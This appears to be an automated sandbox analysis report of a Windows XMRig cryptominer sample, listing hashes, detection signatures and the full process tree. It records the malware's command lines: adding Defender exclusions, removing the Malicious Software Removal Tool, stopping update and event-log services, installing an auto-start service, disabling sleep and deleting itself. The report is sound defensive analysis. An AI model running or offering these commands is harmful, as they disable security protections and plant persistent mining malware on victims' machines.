Analysis
-
max time kernel
148s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
01-11-2024 16:18
Static task
static1
Behavioral task
behavioral1
Sample
6b22681a28f6c7750776eb41e9308c1c1094f3b2.exe
Resource
win7-20241010-en
General
-
Target
6b22681a28f6c7750776eb41e9308c1c1094f3b2.exe
-
Size
5.6MB
-
MD5
26d143f4420e2b0f7204150f2cce348c
-
SHA1
6b22681a28f6c7750776eb41e9308c1c1094f3b2
-
SHA256
c8c6c317c3367951fe857d72470a176aa4ed00e9a0f6d59e6c10c08796ebe935
-
SHA512
23d311f22f0c3d18a3ef4d149d13a6be687788c0014a189e398ec878198252f2055f7601e8fe33123514bb3e9680c6a8009739ee24752e153f82e1fa9d35dd3a
-
SSDEEP
98304:KggSZTFznDHwE8oohoIgNgx+r3P4jw4fn9E32RW0O2gT/gQGhP3oFL6p4kvDZ/Hn:DgSZJznDHMo+JgNgx+r3P+e32BO2gjgj
Malware Config
Signatures
-
Xmrig family
-
XMRig Miner payload 8 IoCs
Processes:
resource yara_rule behavioral1/memory/1840-34-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1840-33-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1840-39-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1840-40-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1840-37-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1840-36-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1840-38-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1840-41-0x0000000140000000-0x0000000140848000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepid process 2892 powershell.exe 2956 powershell.exe -
Creates new service(s) 2 TTPs
-
Deletes itself 1 IoCs
Processes:
cmd.exepid process 2316 cmd.exe -
Executes dropped EXE 2 IoCs
Processes:
fqwofdtexigy.exepid process 464 2412 fqwofdtexigy.exe -
Loads dropped DLL 1 IoCs
Processes:
pid process 464 -
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
Processes:
powercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepid process 2752 powercfg.exe 1452 powercfg.exe 2400 powercfg.exe 1928 powercfg.exe 2188 powercfg.exe 2320 powercfg.exe 2376 powercfg.exe 628 powercfg.exe -
Drops file in System32 directory 4 IoCs
Processes:
powershell.exe6b22681a28f6c7750776eb41e9308c1c1094f3b2.exepowershell.exefqwofdtexigy.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe 6b22681a28f6c7750776eb41e9308c1c1094f3b2.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe fqwofdtexigy.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
fqwofdtexigy.exedescription pid process target process PID 2412 set thread context of 1424 2412 fqwofdtexigy.exe conhost.exe PID 2412 set thread context of 1840 2412 fqwofdtexigy.exe nslookup.exe -
Processes:
resource yara_rule behavioral1/memory/1840-34-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1840-33-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1840-32-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1840-39-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1840-40-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1840-37-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1840-36-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1840-38-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1840-31-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1840-30-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1840-29-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1840-28-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1840-41-0x0000000140000000-0x0000000140848000-memory.dmp upx -
Drops file in Windows directory 2 IoCs
Processes:
wusa.exewusa.exedescription ioc process File created C:\Windows\wusa.lock wusa.exe File created C:\Windows\wusa.lock wusa.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 1672 sc.exe 1264 sc.exe 2364 sc.exe 1520 sc.exe 2304 sc.exe 2804 sc.exe 2792 sc.exe 2816 sc.exe 1168 sc.exe 2828 sc.exe 2492 sc.exe 2244 sc.exe 1548 sc.exe 436 sc.exe -
Modifies data under HKEY_USERS 2 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 803867c6792cdb01 powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
6b22681a28f6c7750776eb41e9308c1c1094f3b2.exepowershell.exefqwofdtexigy.exepowershell.exenslookup.exepid process 2268 6b22681a28f6c7750776eb41e9308c1c1094f3b2.exe 2892 powershell.exe 2268 6b22681a28f6c7750776eb41e9308c1c1094f3b2.exe 2268 6b22681a28f6c7750776eb41e9308c1c1094f3b2.exe 2268 6b22681a28f6c7750776eb41e9308c1c1094f3b2.exe 2268 6b22681a28f6c7750776eb41e9308c1c1094f3b2.exe 2268 6b22681a28f6c7750776eb41e9308c1c1094f3b2.exe 2268 6b22681a28f6c7750776eb41e9308c1c1094f3b2.exe 2268 6b22681a28f6c7750776eb41e9308c1c1094f3b2.exe 2268 6b22681a28f6c7750776eb41e9308c1c1094f3b2.exe 2268 6b22681a28f6c7750776eb41e9308c1c1094f3b2.exe 2268 6b22681a28f6c7750776eb41e9308c1c1094f3b2.exe 2268 6b22681a28f6c7750776eb41e9308c1c1094f3b2.exe 2268 6b22681a28f6c7750776eb41e9308c1c1094f3b2.exe 2268 6b22681a28f6c7750776eb41e9308c1c1094f3b2.exe 2268 6b22681a28f6c7750776eb41e9308c1c1094f3b2.exe 2268 6b22681a28f6c7750776eb41e9308c1c1094f3b2.exe 2412 fqwofdtexigy.exe 2956 powershell.exe 2412 fqwofdtexigy.exe 2412 fqwofdtexigy.exe 2412 fqwofdtexigy.exe 2412 fqwofdtexigy.exe 2412 fqwofdtexigy.exe 2412 fqwofdtexigy.exe 2412 fqwofdtexigy.exe 2412 fqwofdtexigy.exe 2412 fqwofdtexigy.exe 2412 fqwofdtexigy.exe 2412 fqwofdtexigy.exe 2412 fqwofdtexigy.exe 1840 nslookup.exe 1840 nslookup.exe 1840 nslookup.exe 1840 nslookup.exe 1840 nslookup.exe 1840 nslookup.exe 1840 nslookup.exe 1840 nslookup.exe 1840 nslookup.exe 1840 nslookup.exe 1840 nslookup.exe 1840 nslookup.exe 1840 nslookup.exe 1840 nslookup.exe 1840 nslookup.exe 1840 nslookup.exe 1840 nslookup.exe 1840 nslookup.exe 1840 nslookup.exe 1840 nslookup.exe 1840 nslookup.exe 1840 nslookup.exe 1840 nslookup.exe 1840 nslookup.exe 1840 nslookup.exe 1840 nslookup.exe 1840 nslookup.exe 1840 nslookup.exe 1840 nslookup.exe 1840 nslookup.exe 1840 nslookup.exe 1840 nslookup.exe 1840 nslookup.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 464 -
Suspicious use of AdjustPrivilegeToken 11 IoCs
Processes:
powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exenslookup.exedescription pid process Token: SeDebugPrivilege 2892 powershell.exe Token: SeShutdownPrivilege 2376 powercfg.exe Token: SeShutdownPrivilege 628 powercfg.exe Token: SeShutdownPrivilege 1452 powercfg.exe Token: SeShutdownPrivilege 2752 powercfg.exe Token: SeDebugPrivilege 2956 powershell.exe Token: SeShutdownPrivilege 2400 powercfg.exe Token: SeShutdownPrivilege 2320 powercfg.exe Token: SeShutdownPrivilege 1928 powercfg.exe Token: SeShutdownPrivilege 2188 powercfg.exe Token: SeLockMemoryPrivilege 1840 nslookup.exe -
Suspicious use of WriteProcessMemory 23 IoCs
Processes:
cmd.execmd.execmd.exefqwofdtexigy.exedescription pid process target process PID 3016 wrote to memory of 2164 3016 cmd.exe wusa.exe PID 3016 wrote to memory of 2164 3016 cmd.exe wusa.exe PID 3016 wrote to memory of 2164 3016 cmd.exe wusa.exe PID 2316 wrote to memory of 2420 2316 cmd.exe choice.exe PID 2316 wrote to memory of 2420 2316 cmd.exe choice.exe PID 2316 wrote to memory of 2420 2316 cmd.exe choice.exe PID 936 wrote to memory of 1644 936 cmd.exe wusa.exe PID 936 wrote to memory of 1644 936 cmd.exe wusa.exe PID 936 wrote to memory of 1644 936 cmd.exe wusa.exe PID 2412 wrote to memory of 1424 2412 fqwofdtexigy.exe conhost.exe PID 2412 wrote to memory of 1424 2412 fqwofdtexigy.exe conhost.exe PID 2412 wrote to memory of 1424 2412 fqwofdtexigy.exe conhost.exe PID 2412 wrote to memory of 1424 2412 fqwofdtexigy.exe conhost.exe PID 2412 wrote to memory of 1424 2412 fqwofdtexigy.exe conhost.exe PID 2412 wrote to memory of 1424 2412 fqwofdtexigy.exe conhost.exe PID 2412 wrote to memory of 1424 2412 fqwofdtexigy.exe conhost.exe PID 2412 wrote to memory of 1424 2412 fqwofdtexigy.exe conhost.exe PID 2412 wrote to memory of 1424 2412 fqwofdtexigy.exe conhost.exe PID 2412 wrote to memory of 1840 2412 fqwofdtexigy.exe nslookup.exe PID 2412 wrote to memory of 1840 2412 fqwofdtexigy.exe nslookup.exe PID 2412 wrote to memory of 1840 2412 fqwofdtexigy.exe nslookup.exe PID 2412 wrote to memory of 1840 2412 fqwofdtexigy.exe nslookup.exe PID 2412 wrote to memory of 1840 2412 fqwofdtexigy.exe nslookup.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\6b22681a28f6c7750776eb41e9308c1c1094f3b2.exe"C:\Users\Admin\AppData\Local\Temp\6b22681a28f6c7750776eb41e9308c1c1094f3b2.exe"1⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:2268 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2892 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:3016 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵
- Drops file in Windows directory
PID:2164 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:2804 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:2792 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:2828 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:2816 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:2364 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2376 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:628 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1452 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2752 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "JVNIRHNX"2⤵
- Launches sc.exe
PID:2492 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "JVNIRHNX" binpath= "C:\ProgramData\xhzmmmxzrrwn\fqwofdtexigy.exe" start= "auto"2⤵
- Launches sc.exe
PID:1520 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog2⤵
- Launches sc.exe
PID:1548 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "JVNIRHNX"2⤵
- Launches sc.exe
PID:2244 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\6b22681a28f6c7750776eb41e9308c1c1094f3b2.exe"2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2316 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:2420
-
C:\ProgramData\xhzmmmxzrrwn\fqwofdtexigy.exeC:\ProgramData\xhzmmmxzrrwn\fqwofdtexigy.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2412 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2956 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:936 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵
- Drops file in Windows directory
PID:1644 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:1168 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:1672 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:1264 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:436 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:2304 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2400 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1928 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2188 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2320 -
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:1424
-
C:\Windows\system32\nslookup.exenslookup.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1840
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.6MB
MD526d143f4420e2b0f7204150f2cce348c
SHA16b22681a28f6c7750776eb41e9308c1c1094f3b2
SHA256c8c6c317c3367951fe857d72470a176aa4ed00e9a0f6d59e6c10c08796ebe935
SHA51223d311f22f0c3d18a3ef4d149d13a6be687788c0014a189e398ec878198252f2055f7601e8fe33123514bb3e9680c6a8009739ee24752e153f82e1fa9d35dd3a